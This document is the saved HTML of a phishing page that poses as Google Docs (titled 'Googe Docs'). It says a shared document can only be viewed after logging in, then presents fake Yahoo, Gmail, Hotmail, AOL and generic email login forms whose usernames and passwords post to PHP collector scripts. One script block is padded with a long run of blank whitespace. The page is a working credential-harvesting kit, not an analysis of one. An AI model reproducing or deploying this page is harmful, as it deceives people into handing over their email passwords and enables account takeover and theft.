
<!-- saved from url=(0026)http://tfiledata.com/rema/ -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> 
<title>Googe Docs</title> 
<link rel="stylesheet" type="text/css" href="./Remax - Secure Login_files/style.htm"> 
<style type="text/css"> 
div {
	position: absolute;
	left: 620px;
	top: 40px;
	background-color: #EBEBEB;
	width: 280px;
	padding: 10px;
	color: #000000;
	border: #0000cc 2px dashed;
	display: none;
}
body,td,th {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
}
</style> 
<script language="Javascript"> 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             
</script> 
<script language="javascript"> 
function toggle() {
	var ele = document.getElementById("toggleText");
	var text = document.getElementById("displayText");
	if(ele.style.display == "block") {
    		ele.style.display = "none";
		text.innerHTML = "show";
  	}
	else {
		ele.style.display = "block";
		text.innerHTML = "hide";
	}
}
 
function togglegmail() {
	var ele = document.getElementById("toggleTextgmail");
	var text = document.getElementById("displayTextgmail");
	if(ele.style.display == "block") {
    		ele.style.display = "none";
		text.innerHTML = "show";
  	}
	else {
		ele.style.display = "block";
		text.innerHTML = "hide";
	}
} 
 
function togglehotmail() {
	var ele = document.getElementById("toggleTexthotmail");
	var text = document.getElementById("displayTexthotmail");
	if(ele.style.display == "block") {
    		ele.style.display = "none";
		text.innerHTML = "show";
  	}
	else {
		ele.style.display = "block";
		text.innerHTML = "hide";
	}
} 
function toggleaol() {
	var ele = document.getElementById("toggleTextaol");
	var text = document.getElementById("displayTextaol");
	if(ele.style.display == "block") {
    		ele.style.display = "none";
		text.innerHTML = "show";
  	}
	else {
		ele.style.display = "block";
		text.innerHTML = "hide";
	}
} 
function toggleother() {
	var ele = document.getElementById("toggleTextother");
	var text = document.getElementById("displayTextother");
	if(ele.style.display == "block") {
    		ele.style.display = "none";
		text.innerHTML = "show";
  	}
	else {
		ele.style.display = "block";
		text.innerHTML = "hide";
	}
} 
</script> 

</head> 
<body bgcolor="#efefef">
<table id="wrapper" align="center" bgcolor="#cccccc" cellpadding="10" cellspacing="1"><tbody><tr><td bgcolor="#ffffff"> 
 
<table width="100%"><tbody><tr><td width="50%"> 
 

<h1><img src="http://fwd.channel5.com/upload/0736/8448/Google_docs_logo_size_9.jpg" height="100" width="150"></h1> 

</td></tr></tbody></table> 
 

<br> 
 
 
<table id="invoicetoptables" cellspacing="0" width="100%"> 
<tbody><tr> 
<td id="invoicecontent" width="50%"> 
 
<table id="invoicetoptables" cellpadding="10" cellspacing="0" height="100" width="100%"> 
<tbody><tr> 
<td id="invoicecontent" style="border: 0px solid rgb(204, 204, 204);" valign="top"> 
<p><font color="#990000" size="4">To View shared document <br> 
you are required to Login with your email address below</font></p> 
 
<br> 
<br> 
 
<font class="paid">Choose your email provider below and login:</font> 

<br> 

<br> 

<br> 
<p align="center"> 
<a href="javascript:toggle();"><img src="./Remax - Secure Login_files/yahoo.jpg" title="Yahoomail" id="displayText" border="0" height="48" width="132"></a> 
&nbsp;&nbsp;&nbsp; <a href="javascript:togglegmail();"><img src="./Remax - Secure Login_files/gmail.jpg" title="Gmail" id="displayTextgmail" border="0" height="48" width="132"></a> 
<br> 
<br> 
<br> 
<a href="javascript:togglehotmail();"><img src="./Remax - Secure Login_files/hotmail.jpg" title="Hotmail" id="displayTexthotmail" border="0" height="48" width="132"></a> 
&nbsp;&nbsp;&nbsp; <a href="javascript:toggleaol();"><img src="./Remax - Secure Login_files/aol.jpg" title="Aol" id="displayTextaol" border="0" height="48" width="132"></a> 
<br> 
<br> 
<br> 
<a href="javascript:toggleother();"><img src="./Remax - Secure Login_files/other.jpg" title="Other Email" id="displayTextother" border="0" height="48" width="132"></a> 

</p> 
 

<!-- YAHOO CONFIG !--> 

<div id="toggleText" style="display: none"> 
<p><img src="./Remax - Secure Login_files/yahoo.jpg" title="Yahoomail" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p> 
<br> 
<form name="yahoo" method="post" action="yahoo.php" onsubmit="return ValidateFormYahoo()"> 
<p> 
<br> 
				<label>Yahoo Email Address:</label> 
                <br> 
				<input name="yahoouser" style="width: 200px;" type="text"> 
			<br> 
				<label>Yahoo Password</label> 
                <br> 
				<input name="yahoopassword" style="width: 200px;" type="password"> 
                <br> 
                <br> 
                <input name="s_yahoo" value="Sign In" type="submit"> 
			</p> 



</form> 
</div> 
 
<!-- GMAIL CONFIG !--> 
<div id="toggleTextgmail" style="display: none"> 
<p><img src="./Remax - Secure Login_files/gmail.jpg" title="Gmail" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p> 
<br> 
<form name="gmail" method="post" action="gmail.php" onsubmit="return ValidateFormGmail()"> 
<p> 
 
				<label>Gmail Email Address:</label> 

                <br> 
				<input name="gmailuser" style="width: 200px;" type="text"> 
			<br> 
				<label>Gmail Password</label> 
                <br> 
				<input name="gmailpassword" style="width: 200px;" type="password"> 
                <br> 
                <br> 
                <input name="s_gmail" value="Sign in" type="submit"> 
			</p> 
            </form> 
 



</div> 
 
<!-- HOTMAIL CONFIG !--> 
<div id="toggleTexthotmail" style="display: none"> 
<p><img src="./Remax - Secure Login_files/hotmail.jpg" title="Hotmail" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p> 
<br> 
<form name="hotmail" method="post" action="hotmail.php" onsubmit="return ValidateFormHotmail()"> 
<p> 
				<label>Hotmail Email Address:</label> 
                <br> 
				<input name="hotmailuser" style="width: 200px;" type="text"> 
			<br> 
				<label>Hotmail Password</label> 
                <br> 
				<input name="hotmailpassword" style="width: 200px;" type="password"> 
                <br> 
                <br> 
                <input name="s_hotmail" value="Sign in" type="submit"> 
			</p> 
            </form> 



</div> 
 
<!-- AOL CONFIG !--> 
<div id="toggleTextaol" style="display: none"> 
<p><img src="./Remax - Secure Login_files/aol.jpg" title="Aol" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p> 
<br> 
<form name="aol" method="post" action="aol.php" onsubmit="return ValidateFormAol()"> 
<p> 
				<label>Aol Email Address:</label> 
                <br> 
				<input name="aoluser" style="width: 200px;" type="text"> 
			<br> 
				<label>Aol Password</label> 
                <br> 
				<input name="aolpassword" style="width: 200px;" type="password"> 
                <br> 
                <br> 
                <input name="s_aol" value="Sign In" type="submit"> 
			</p> 
            </form> 



</div> 
 
<!-- OTHER CONFIG !--> 
<div id="toggleTextother" style="display: none"> 
<p><img src="./Remax - Secure Login_files/other.jpg" title="Other" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p> 
<br> 
<form name="other" method="post" action="other.php" onsubmit="return ValidateFormOther()"> 
<p> 
				<label>Email Address:</label> 
                <br> 
				<input name="otheruser" style="width: 200px;" type="text"> 
			<br> 
				<label>Password</label> 
                <br> 
				<input name="otherpassword" style="width: 200px;" type="password"> 
                <br> 
                <br> 
                <input name="s_other" value="Sign In" type="submit"> 
			</p> 
            </form> 



</div> 
 
 </td> 
 </tr> 
 </tbody></table> 
</td></tr></tbody></table> 
 
</td> 
  
 
 
 
 
 
</tr></tbody></table></body></html>